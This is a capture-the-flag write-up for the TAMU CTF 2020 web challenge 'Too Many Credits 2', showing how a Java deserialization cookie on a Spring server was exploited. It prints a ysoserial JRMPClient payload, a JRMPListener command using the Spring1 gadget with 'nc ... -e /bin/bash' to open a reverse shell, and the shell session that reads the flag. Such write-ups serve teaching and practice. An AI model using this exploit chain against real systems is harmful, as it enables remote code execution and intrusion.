Too Many Credits 2 [web]
TAMU CTF 2020

Too Many Credits 2

Even if you could get the first flag, I bet you can't pop a shell!

Recon

Same server as "Too many credits 1".w

We get a cookie with base64 -> gzip -> java serialized data. Possible RCE.

Plan

  • Analyze "normal" serialized data in cookie
  • Enumerate technologies used (maybe spring/springboot?)
  • Springframework is in use, no specific version identified

Responses

Server responds to any URI with the main routine, e.g:

  • /klsajlfksdjfljdslak results in the main page being shown.
  • /favicon.ico actually results in an icon.

Trying a different method to see what happens:

$ curl -X DELETE 'http://toomanycredits.tamuctf.com/'

{
    "error": "Method Not Allowed",
    "exception": "org.springframework.web.HttpRequestMethodNotSupportedException",
    "message": "Request method 'DELETE' not supported",
    "path": "/",
    "status": 405,
    "timestamp": 1584723698736
}

Given that, we know that at least the package org.springframework.web is loaded in the classpath of some classloader. We'd have to see if we can find gadgets in either spring-web itself or any of its dependencies, along with the usual suspects, e.g. Apache commons.

Available ysoserial gadgets

JRMPClient payload seems to work. We need a server that's listening on JRMP connections, we can use ysoserial's listener for that and deliver a payload that'd hopefully do the job, payloads tested:

Payload generation with JRMPClient

$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient 'redacted:2020' | gzip - | base64 | tr -d '\n'
H4sIAAAAAAAAA1vzloG1uJaBgYGRQSorsSxRryg3U68oNT2zuKSoUi8IyqgoYhAHy+Yk5qUDpdNyUpNL9AKK8isqH6rfUjgj4HyaiYHRh4Exo4RB1QekUh+kUh+qUt8zryw/ObEkMz/PIzEvJSe1yLqioLiIQRduY3FqUVlqEdC+3PySVP+kLKAmDD0MEMDExMAAdI8MPr2XE7dM5Ek0lmMGKi0oN2TgCs3LTE4sLglKTWPgKEpNSUwuSU1hYGB/8h8IWgSKYhlQQQUARte0eBcBAAA=

Set up a JRMPListener on the server on port 2020, and a listener for a shell on port 2025:

~/ysoserial# java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 2020 Spring1 'nc redacted 2025 -e /bin/bash'
* Opening JRMP listener on 2020

We make a HTTP connection with our payload as cookie and get a connection back:

misc:~# nc -lvp 2025
listening on [any] 2025 ...
connect to [49.12.39.229] from ec2-34-208-211-186.us-west-2.compute.amazonaws.com [34.208.211.186] 43713
ls
bin
flag.txt
lib
cat flag
cat flag.txt
gigem{da$h_3_1s_A_l1f3seNd}

Flag

gigem{da$h_3_1s_A_l1f3seNd}